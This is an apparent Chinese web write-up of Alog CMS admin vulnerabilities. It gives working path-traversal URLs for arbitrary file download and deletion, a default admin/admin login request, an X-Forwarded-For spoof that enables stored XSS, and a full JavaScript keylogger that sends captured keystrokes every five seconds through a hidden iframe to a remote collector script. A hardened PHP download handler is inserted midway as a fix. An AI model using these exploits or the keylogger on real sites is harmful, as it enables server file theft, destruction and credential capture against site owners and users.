Source: 自学PHP网 (zixuephp.com)  Date: 2015-04-17 12:00  Author: (not given)
Alog CMS
Admin backend: arbitrary file download, arbitrary file deletion, arbitrary directory listing
Vulnerable file: admin/mod/uploadfile.mod.php
$baseDir = SITE_ROOT.'static/upload/';
$currentDir = $_GET['dir'] ? $_GET['dir'] : ($_POST['dir'] ? $_POST['dir'] : ''); // no filtering of any kind
$currentPath = $baseDir.$currentDir;
Arbitrary download
$uploadfile = $_GET['uploadfile'] ? $currentPath.'/'.$_GET['uploadfile'] : $currentPath;
// the file name in $_GET['uploadfile'] passes through no security filtering either
if (@is_file($uploadfile)) // if the file exists it is served for download immediately
{
    $fileName = basename($uploadfile);
    $fileNameInfo = explode('.', $fileName);
    $fileType = $fileNameInfo[count($fileNameInfo) - 1];
    header('Content-type: application/x-'.$fileType);
    header('Content-Disposition: attachment; filename='.$fileName);
    header('Content-Description: PHP3 Generated Data');
    readfile($uploadfile);
    exit;
}
EXP
http://localhost/upload/admin/index.php?m=uploadfile&a=download&dir=advertisiment/../../../admin&uploadfile=index.php
http://localhost/upload/admin/index.php?m=uploadfile&a=delete&dir=&uploadfile=advertisiment/../../../2.php
Login: http://localhost/upload/admin/index.php?m=login&a=login
POST body: userName=admin&password=admin&VCode=anqm&lang=zh-cn
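The download handler above builds the file path straight from dir and uploadfile. The hardened handler below is an added example, not Alog CMS code: it canonicalises the requested path with realpath() and serves it only if it resolves to a regular file under the upload directory. The helper name resolveUploadPath and the existence of the SITE_ROOT constant are assumptions.

```php
<?php
// Added example, not Alog CMS code: resolve a user-supplied dir/file pair and
// return its absolute path only if it is a regular file inside $baseDir.
// Returns null on traversal, missing file, NUL bytes or a non-bare file name.
function resolveUploadPath(string $baseDir, string $dir, string $file): ?string
{
    if ($file === '' || strpos($dir . $file, "\0") !== false) {
        return null;                       // empty name or NUL byte injection
    }
    if (basename($file) !== $file) {
        return null;                       // file name must carry no separators
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;                       // upload directory does not exist
    }
    // realpath() collapses "." and ".." and follows symlinks, so the check
    // below is made on the canonical path, not on the raw user string.
    $candidate = realpath($base . '/' . ltrim($dir, '/\\') . '/' . $file);
    if ($candidate === false || !is_file($candidate)) {
        return null;
    }
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;                       // escaped the upload tree
    }
    return $candidate;
}

// Hardened download action (SITE_ROOT is assumed to be defined by the application).
$baseDir = SITE_ROOT . 'static/upload/';
$dir  = is_string($_GET['dir'] ?? null) ? $_GET['dir'] : '';
$file = is_string($_GET['uploadfile'] ?? null) ? $_GET['uploadfile'] : '';
$path = resolveUploadPath($baseDir, $dir, $file);
if ($path === null) {
    http_response_code(404);
    exit;
}
// Refuse to hand out server-side source even if it was uploaded into the tree.
$ext = strtolower(pathinfo($path, PATHINFO_EXTENSION));
if (in_array($ext, ['php', 'phtml', 'php3', 'phar'], true)) {
    http_response_code(403);
    exit;
}
header('Content-Type: application/octet-stream');
header('X-Content-Type-Options: nosniff');
header('Content-Disposition: attachment; filename="' . rawurlencode(basename($path)) . '"');
readfile($path);
exit;
```

The delete action has the same root cause and should resolve its target through the same helper before calling unlink().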
Listing directory files
Guestbook: the X-Forwarded-For header can be spoofed to bypass the check, leading to cross-site scripting
Header: X-Forwarded-For: 192.168.1.1
Using the XSS to delete backend files
Obtaining the backend path and monitoring typed characters
1.js
var keys = ''; // stores the keystroke log
var key;
document.onkeypress = function(e) { // hook the keyboard event
    var get = window.event ? event : e; // get the event object
    key = get.keyCode ? get.keyCode : get.charCode;
    switch (key) {
        case 32: key = '[Space]'; break;
        case 13: key = '[Enter]'; break;
        default:
            key = String.fromCharCode(key);
            keys += key;
            //alert(key+"||"+keys);
    }
}
function f()
{
    var $url = escape(window.location.pathname);
    var ifm = document.createElement("IFRAME");
    document.body.appendChild(ifm);
    ifm.width = 0;
    ifm.height = 0;
    ifm.src = "http://localhost/upload/7.php?x=" + $url + "//" + keys;
}
window.setInterval(f, 5000);
//setTimeout(f,"1000");